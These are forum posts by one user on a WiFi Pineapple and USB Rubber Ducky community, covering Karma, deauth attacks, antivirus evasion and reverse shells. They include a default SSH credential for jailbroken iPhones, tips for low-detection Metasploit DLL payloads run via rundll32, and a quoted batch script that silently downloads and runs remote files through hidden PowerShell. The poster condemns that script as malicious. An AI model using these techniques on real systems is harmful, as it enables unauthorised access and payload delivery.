Xcellerator

Not gonna happen, I'm afraid. You'd need to be able to get root access to the device remotely. That in itself is pretty unlikely! *IF* you were able to get SSH access to the device (funnily enough is still pretty common on jailbroken iPhones, try root:alpine) then you can SCP out anything you like. On Androids, people tend to be a lot more tech-savvy and lock down their SSH or at least change the default password. It's not as simple as just 'copying out their preconfigured password files'. The apps are pretty darn secure, and you're not gonna be able to just sniff out the logins because they remain authenticated unless the app is force-closed. Even if the internet connection is lost or the server is unavailable, they still won't attempt to re-authenticate. You'd have to be pretty damn lucky to grab a login from an app. As far as I know, SSL/TLS can't be downgraded to HTTPS/SSL 2.0, so yeah sslstrip isn't gonna work. It's actually surprising that sslstrip has remained working this long!

Technically, its the same process. But putting wlan1 in monitor mode is preferred because its the 'free' card and is also the 'better' card (RTL8187). wlan0 is the Atheros card and will typically be in managed mode and act as an AP.

The wiki is your friend! ;) http://wiki.wifipineapple.com/index.php/Serial_UART

Really? That's interesting! Will there be a detailed breakdown of what those weaknesses are along with the eventual update? It'll be interesting to read about..

Its actually harder than it sounds. Even if you cut off the connection to Facebook or Twitter, you wouldn't sign them out. Try putting your phone in airplane mode then open Facebook, it just says "no connection". Even forwarding requests from ""http://www.facebook.com/logout.php" won't work, you just get redirected to "/home.php". I guess its down to either come kind of cookie or session type thing or maybe some PHP voodoo. Haven't actually checked on my own Pineapple, but is there a way to do session hijacking? Would probably be the closest to what you're after. Surprisingly, sites like Facebook and Twitter are actually pretty good at keeping user details tied up little bows so nasty hackers can't get to them..

The wiki is your friend. http://wiki.wifipineapple.com/index.php/Karma Read the last section. What devices are you trying to hijack using Karma? It will help to see if its a bug or just the way that karma works.

Even then, some crypters actually INCREASE the likelihood of detection due to the fact that the engine has to be in the stub somewhere so that the code can be decrypted at runtime. That's why there are lots of EXE encryption engines, but only a few are actually used by the majority.

It depends on what you're trying to get past the AV. Antivirus works in lots of ways, for instance a 'file shield' works by detecting known signatures within files that are being transferred to the hard disk. Many AV also have firewalls, web page scanners, email client scanners, and some even have P2P network shields. It would help to know what it is your trying achieve, is it just executing a binary on a remote host?

The name you set in Karma configuration is the SSID given to wlan0. Before it would have been "Pineapple5_<last two octets of MAC address>".. You might aswell set it to something inconspicuous like "NETGEAR" or "linksys"..

It's not hardware based as the hardware itself can't change. As far as hardware is concerned (for WiFi anyway) is very simple physics and only works in the way they're built. However, its all down to the software used to interface the hardware. Developers patch up their OS to avoid broadcasting requests while connected to a network. For this reason, you'll find devices fit into three categories. 1. Karma works as it always had (getting rare, usually old phones that people don't bother updating) 2. Karma works intermittently (only broadcasts requests when not connected, i.e searching for a known SSID) 3. Karma doesn't work at all You should try sending out deauth packets to disconnect a client and then see if Karma works (meaning its in category 2)

SkyDrive is good. I know you used to be able to use GoogleDrive, but not 100% sure if you still can. 9/10 I just host the file myself and get the script to connect back to me - usually its a shell anyway, so I'm on the network.. If they're just scripts, then pastebin takes care of everything.

Yeah, Karma doesn't really work on anything newer than ~2012.. Theoretically it's possible to get it working again, and this has been hinted at by the Devs, but very little has actually been said. Besides, Karma is by no means the main selling point of the Pineapple anymore, the project has expanded to be much more.

You cannot just grab direct download links from mediafire. You agree, while using MediaFire Services, that you may not: . . . Use any robot, spider, offline readers, site search and/or retrieval application, or other device to retrieve or index any portion of the Services, with the exception of public search engines; from: http://www.mediafire.com/policies/terms_of_service.php

What payloads have you been trying? Post the scripts, also what OS are you testing against?

I'd recommend using the metasploit framework. I make all my shells through it. It's better than using the same exe every time cos you can add encoding options and even run the whole connection over https rather than tcp. Seeing as your using the ducky, I'd recommend generating a dll rather than an exe - much lower AV detection rate. Run a dll using this: rundll32.exe file.dll, @DllMain12

What you're asking for is a bind shell rather than a reverse shell. A bind shell works by the target computer literally binding their shell to a port that you connect to. A reverse shell works by the target computer connecting you to over a port and then providing the shell. Both have the same effect but achieve it in very different ways.

Well, the machines I've tested on (powershell in windows, and wget in linux) both just downloaded a web page. What version of windows did you test on? Can you post a screenshot of the download being successful? As in the powershell command (without the hidden window style bit) and then 'type' the bat file? @echo off powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1505.mediafire.com/uqxpahdvmi5g/iqgb5774sqcyu7c/updater.vbs','C:\updater.vbs') powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1647.mediafire.com/dhhclv61cblg/gjnalpa67hvpb43/update.bat','C:\update.bat') powershell -windowstyle hidden Start-Process "C:\updater.vbs" This is what the initial bat file is when you download it through mediafire.

How about you try: wget http://download1585.mediafire.com/3j2upgu7avbg/8runbhhu8fjrjah/Runner1.bat; cat Runner1.bat and then tell me it works. I see no reason for you to be offensive (the preschool remark), I've merely given my opinion that I think what you're doing is immoral and not in vein with what (the majority) of this community is about. I also pointed out an actual problem with your script (although I disagree with its purpose, I think that the execution is clever). Mediafire don't allow direct downloads via links, they want you to go to their site and click the link manually which forwards you around some PHP (or ASP, whatever they use..) to serve up the download. It stops people mass downloading huge files from their servers and clogging up their bandwidth. A better idea would be stick it on pastebin and use the raw link they'll give you (seeing as it's essentially just text files your downloading). I wrote a ducky script using this technique to add an open wifi network to a windows machine (to autoconnect to the pineapple) You can see it here if you like: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---Pineapple-Assocation-(VERY-FAST) Backdoors can be used a demonstration of "hey look, in just a few seconds I installed this thing that lets me access all your stuff - you should really fix this so that someone doesn't come along and cause some real damage" - that's what I'd use it for anyway..

By all means, demonstrate to a person or corporation the risks posed by physical security, but what you're proposing is just causing unnecessary harm and wasting the time of other people. Dunno about you, but I see hacking as way of furthering my own understanding and fixing holes in security - not deliberately using my own knowledge to harm or annoy others. Also, you obviously haven't tested your script - the download points to mediafire. Try wgetting that, all you get is a html page.. I understand where you're coming from, and there's nothing wrong with payloads that download and run scripts. Its what the script does that's the problem. Changing someones wallpaper or planting a backdoor isn't anything like causing popups every minute - and they're persistent after reboot..

Generally, if possible, I try and get a bit of info about the machine first. I take a look at the keyboard they're using, (Dell, Microsoft, etc) and try and go from there. Doesn't always work, but most of the time I can bypass the whole driver installation business.

This is just malicious and all it would do is take up some poor admins time to fix it. Spreading across a network just exacerbates the problem. Teach people about physical security by demontration, not causing harm to them or interrupting their work flow - that doesn't help anyone.

Good to hear! Looking forward to the update!

Fantastic! Works perfectly! Anyone happen to know why this is the case?

Not sure exactly where this should go, not an issue with a particular infusion, but a general one. Has anyone else had trouble with the "-1" channel problem? I've been getting it when using Bully and Airodump. Bully in particular won't let me do anything at all. I get an error about being unable to set channel on mon0. I had the same problem with the aircrack-ng suite on my laptop, but I just compiled the bleeding edge version which has a --ignore-negative-one. That solved it in the sense that I could use the program, but it still said "CH: -1" at the top. Anyone else had anything like this?

Yeah, I've noticed a huge stability boost from using the 2 amp usb rather than the 1 amp one. Both output 5v.